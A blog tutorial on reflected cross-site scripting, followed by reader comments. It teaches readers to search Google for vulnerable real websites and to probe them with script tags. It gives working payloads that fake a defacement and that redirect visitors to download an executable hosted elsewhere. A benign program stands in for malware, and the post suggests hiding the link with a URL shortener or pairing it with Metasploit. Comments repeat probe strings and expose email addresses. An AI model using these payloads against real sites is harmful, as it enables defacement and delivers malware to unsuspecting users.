• 26,769
  • +1,026
  • 3,010
Basic Hacking via Cross Site Scripting (XSS) – The Logic

Basic Hacking via Cross Site Scripting (XSS) – The Logic

Bookmark

Basic Hacking via Cross Site Scripting (XSS) – The Logic is our tutorial title for today.

Type : Tutorial

Level : Medium

Target : Cross Site Scripting (XSS) Vulnerable website

According to wikipedia.org Cross Site Scripting (XSS) is :

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users.

So let say that Cross Site Scripting (XSS) was a hacking method that allow attacker inject some script to web server that can affect other users that accessing that webpage.

Actually there's 2 types of Cross Site Scripting (XSS) : Non-Persistent and Persistent (you can read it more at wikipedia), but in this tutorial we will learn about the non-persistent one.

One of my computer security class student 3 years ago ask me about "what will I got if I successfully found a vulnerable XSS website?", I simply can answer "it's depend"; yes it is depend on how the server handle your request and how they take care the malicious data you provide to the server, but the non-persistent one is great enough to spread a malicious file to many internet users.

Let's start the tutorial

Requirements :

1. Found a Cross Site Scripting (XSS) vulnerable website, or

2. You can download the simple PHP file I have already create below (download link)

Mediafire.com

 

Step by Step :

1. You can use the PHP file I already put on mediafire.com for you test it on your own lab(use XAMPP), but for this tutorial I will use from real website on the wild internet (do not worry, the logic was the same, once you understand it you'll got the point)

2. Use Google to search for vulnerable website :

Basic Hacking via Cross Site Scripting (XSS) - The Logic

Pencarian was Indonesian language equal to searching, you can modify the Google parameter for search the much more specific website even in your own language.

3. To find a vulnerable website, you need to do a trial and error. I'm testing more than 5 website to test for their search feature is it vulnerable or not for XSS.

Basic Hacking via Cross Site Scripting (XSS) - The Logic

The simple method to test was using <h1> and <script>alert('x');</script> tag like example picture above.

4. If the website was vulnerable, you will find something like this.

Basic Hacking via Cross Site Scripting (XSS) - The Logic

Description :

1. I test other website and input the code <h1>TEST</h1> or <script>alert('x');</script> on search box.

2. The result was show a heading title, but I'm not sure, then

3. I check the selection source to make sure it's not a bold :-p

4. Oops..my query was purely processed by server without filtering :-)

5. Now we got the vulnerable website what to do next?? Did you know that with Cross Site Scripting (XSS) you also can do a defacing to a website by injecting some code in it?(not really deface/fake)

Basic Hacking via Cross Site Scripting (XSS) - The Logic

 

Description :

I put this script on search box to display the fake website deface.

<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>

6. This Cross Site Scripting (XSS) Vulnerability also you can use to steal a session cookie, I will write the tutorial later ๐Ÿ™‚

7. Now after we can do deface, show a heading tag, and alerting using javascript what next?

Let say I have a fake exe program that containing a malicious program and I host it on another website and I want some user download it. In this tutorial I will use putty.exe as a malicious program that can be downloaded from http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe. BTW putty was not a malicious program…in this case I only use it for testing purpose to make sure the attack was work.

Basic Hacking via Cross Site Scripting (XSS) - The Logic

Description :

On the search box I put the script :
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>

so the URL was like this :

http://www.vulnerablewebsite.com/search?keyword=%3Cscript%3Edocument.location=%22http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe%22;%3C/script%3E\

8. It's too long ๐Ÿ˜› so maybe some service that can make URL more short will be useful to make the link like this :

http://goo.gl/T5tPth

9. From the step 7 and 8 can you imagine how if the attacker was use the real malicious file to harm user computer? or maybe the attacker combine it with backtrack metasploit like my other tutorial (view here)? only you who can answer it ๐Ÿ™‚

If you still not clear for the tutorial above, you can view the video below:

 

 

Countermeasures/Prevention :

1. For developer : always filter user input and prevent some special characters being processed before filter it first.

2. For user : If you find unusual or strange environment from website you visited, it's better to leave it out.

Hope you found it useful ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Pingback: Hacking Tutorial Cookie Stealing via Cross Site Scripting (XSS) Persistent Type | Vishnu Valentino Ethical Hacking Tutorial, Security Tips and Trick()

  • tank you for learn hack  via   xss 
    very good 
    tank

  • hey !! this really worked for me
    !!!!

  • Hashcracker001

    The video link is not working.
    Repair it bro!! :D.

    • v4L

      #Hashcracker001

      Fixed! ๐Ÿ™‚ thanks for reporting

  • NoArmsNoLegsInTheOcean

    The strings you use are better than most books published on XSS. Are those two your favorite strings to find XSS vulns or are there more you are not willing to put up here ๐Ÿ™‚ ?

    • v4L

      #NoArmsNoLegsInTheOcean
      as long as it works it will be my favourite ๐Ÿ™‚

  • imafcknn00b

    Hi,

    I have a question:
    What’s the point of letting people download malicious software through a vulnerable site? Couldn’t you just use the URL shrinker on the original link?

  • hermox

    hehehe ๐Ÿ™‚ Thank you ๐Ÿ™‚

  • ESETV NOMAS

    Please could you provide another link to download the php code?

  • …a

    v

  • sa

    alert(‘x’);

  • alert(“hacked”); </sc

    alert(“hacked”);

  • caroo

    caroo1944@einrot.com

  • shahoruq

    @vishnuvalentino:disqusI have subscribed the mailing list but cannot download the php file from the mediafire .
    please check it or you only send it to me directly on my mail ID- mdshah1994@gmail.com

  • thamexr

    alert(‘thamexr’)

  • thamexr
  • mahdi

    hi
    very good
    thank you
    hope god

  • janu agrawal

    <script>alert(1)</script>